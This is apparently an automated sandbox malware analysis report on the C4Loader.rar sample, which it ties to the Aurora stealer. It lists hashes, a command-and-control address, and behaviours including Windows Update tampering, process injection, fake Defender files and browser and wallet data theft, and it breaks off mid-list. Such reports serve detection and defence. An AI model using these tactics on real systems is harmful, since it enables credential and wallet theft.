Analysis
-
max time kernel
168s -
max time network
183s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
10-03-2023 19:16
Static task
static1
Behavioral task
behavioral1
Sample
C4Loader.rar
Resource
win7-20230220-en
General
-
Target
C4Loader.rar
-
Size
130KB
-
MD5
931ddbdafed0212e3b1da2460907950c
-
SHA1
57d23f7f836befc775cc3f790115b65a503d158a
-
SHA256
c4d92f2b4fe82c7eca69558a5e62e270e0486ce0fcffe51aa72ed2ed104cb7e8
-
SHA512
a8e9cf280ebf4070f3d7133c9eb63929da81e98de8fc2be0b90e0d1e58204406b4cbe7b6a92a99e5417434d39f3fc2b791bc4a749989d0c4955f6346cf5f8c4d
-
SSDEEP
3072:krhy/OohnJqAvej6Svh6m2aBg6gwFTbFwLyTh2ShCCpqC:ihMhnUj6SMyBg6gwH80hI4
Malware Config
Extracted
aurora
107.182.129.73:8081
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
SmartDefRun.exedescription pid process target process PID 1120 created 2676 1120 SmartDefRun.exe Explorer.EXE PID 1120 created 2676 1120 SmartDefRun.exe Explorer.EXE PID 1120 created 2676 1120 SmartDefRun.exe Explorer.EXE PID 1120 created 2676 1120 SmartDefRun.exe Explorer.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 79 2412 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
SmartDefRun.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 5 IoCs
Processes:
C4Loader.exeC4Loader.exenew2.exeSysApp.exeSmartDefRun.exepid process 2368 C4Loader.exe 432 C4Loader.exe 1128 new2.exe 3748 SysApp.exe 1120 SmartDefRun.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
C4Loader.exeSmartDefRun.exedescription pid process target process PID 2368 set thread context of 3208 2368 C4Loader.exe RegSvcs.exe PID 1120 set thread context of 2696 1120 SmartDefRun.exe dialer.exe -
Drops file in Program Files directory 1 IoCs
Processes:
SmartDefRun.exedescription ioc process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 4128 sc.exe 716 sc.exe 4200 sc.exe 1492 sc.exe 748 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4652 2368 WerFault.exe C4Loader.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE -
Modifies registry class 64 IoCs
Processes:
cmd.exeOpenWith.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications\7zFM.exe\shell\open\command OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications\7zFM.exe OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\.rar OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications\7zFM.exe\shell OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications\7zFM.exe\shell\open OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\rar_auto_file\shell\open OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\rar_auto_file\shell OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\rar_auto_file\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\rar_auto_file\shell\open\command OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\rar_auto_file OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Applications\7zFM.exe\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 8c003100000000005456c7ac110050524f4752417e310000740009000400efbe874fdb495456c7ac2e0000003f0000000000010000000000000000004a000000000072d6f700500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000 OpenWith.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
powershell.exeSysApp.exeSmartDefRun.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpid process 2412 powershell.exe 2412 powershell.exe 3748 SysApp.exe 3748 SysApp.exe 3748 SysApp.exe 3748 SysApp.exe 3748 SysApp.exe 3748 SysApp.exe 3748 SysApp.exe 3748 SysApp.exe 3748 SysApp.exe 3748 SysApp.exe 1120 SmartDefRun.exe 1120 SmartDefRun.exe 3668 powershell.exe 3668 powershell.exe 1120 SmartDefRun.exe 1120 SmartDefRun.exe 1120 SmartDefRun.exe 1120 SmartDefRun.exe 1144 powershell.exe 1144 powershell.exe 1120 SmartDefRun.exe 1120 SmartDefRun.exe 3572 powershell.EXE 60 powershell.EXE 3572 powershell.EXE 60 powershell.EXE -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
OpenWith.exe7zFM.exepid process 4440 OpenWith.exe 3432 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exepowershell.exewmic.exeWMIC.exedescription pid process Token: SeRestorePrivilege 3432 7zFM.exe Token: 35 3432 7zFM.exe Token: SeSecurityPrivilege 3432 7zFM.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeIncreaseQuotaPrivilege 4340 wmic.exe Token: SeSecurityPrivilege 4340 wmic.exe Token: SeTakeOwnershipPrivilege 4340 wmic.exe Token: SeLoadDriverPrivilege 4340 wmic.exe Token: SeSystemProfilePrivilege 4340 wmic.exe Token: SeSystemtimePrivilege 4340 wmic.exe Token: SeProfSingleProcessPrivilege 4340 wmic.exe Token: SeIncBasePriorityPrivilege 4340 wmic.exe Token: SeCreatePagefilePrivilege 4340 wmic.exe Token: SeBackupPrivilege 4340 wmic.exe Token: SeRestorePrivilege 4340 wmic.exe Token: SeShutdownPrivilege 4340 wmic.exe Token: SeDebugPrivilege 4340 wmic.exe Token: SeSystemEnvironmentPrivilege 4340 wmic.exe Token: SeRemoteShutdownPrivilege 4340 wmic.exe Token: SeUndockPrivilege 4340 wmic.exe Token: SeManageVolumePrivilege 4340 wmic.exe Token: 33 4340 wmic.exe Token: 34 4340 wmic.exe Token: 35 4340 wmic.exe Token: 36 4340 wmic.exe Token: SeIncreaseQuotaPrivilege 4340 wmic.exe Token: SeSecurityPrivilege 4340 wmic.exe Token: SeTakeOwnershipPrivilege 4340 wmic.exe Token: SeLoadDriverPrivilege 4340 wmic.exe Token: SeSystemProfilePrivilege 4340 wmic.exe Token: SeSystemtimePrivilege 4340 wmic.exe Token: SeProfSingleProcessPrivilege 4340 wmic.exe Token: SeIncBasePriorityPrivilege 4340 wmic.exe Token: SeCreatePagefilePrivilege 4340 wmic.exe Token: SeBackupPrivilege 4340 wmic.exe Token: SeRestorePrivilege 4340 wmic.exe Token: SeShutdownPrivilege 4340 wmic.exe Token: SeDebugPrivilege 4340 wmic.exe Token: SeSystemEnvironmentPrivilege 4340 wmic.exe Token: SeRemoteShutdownPrivilege 4340 wmic.exe Token: SeUndockPrivilege 4340 wmic.exe Token: SeManageVolumePrivilege 4340 wmic.exe Token: 33 4340 wmic.exe Token: 34 4340 wmic.exe Token: 35 4340 wmic.exe Token: 36 4340 wmic.exe Token: SeIncreaseQuotaPrivilege 4652 WMIC.exe Token: SeSecurityPrivilege 4652 WMIC.exe Token: SeTakeOwnershipPrivilege 4652 WMIC.exe Token: SeLoadDriverPrivilege 4652 WMIC.exe Token: SeSystemProfilePrivilege 4652 WMIC.exe Token: SeSystemtimePrivilege 4652 WMIC.exe Token: SeProfSingleProcessPrivilege 4652 WMIC.exe Token: SeIncBasePriorityPrivilege 4652 WMIC.exe Token: SeCreatePagefilePrivilege 4652 WMIC.exe Token: SeBackupPrivilege 4652 WMIC.exe Token: SeRestorePrivilege 4652 WMIC.exe Token: SeShutdownPrivilege 4652 WMIC.exe Token: SeDebugPrivilege 4652 WMIC.exe Token: SeSystemEnvironmentPrivilege 4652 WMIC.exe Token: SeRemoteShutdownPrivilege 4652 WMIC.exe Token: SeUndockPrivilege 4652 WMIC.exe Token: SeManageVolumePrivilege 4652 WMIC.exe Token: 33 4652 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
7zFM.exepid process 3432 7zFM.exe 3432 7zFM.exe -
Suspicious use of SetWindowsHookEx 26 IoCs
Processes:
OpenWith.exepid process 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe 4440 OpenWith.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
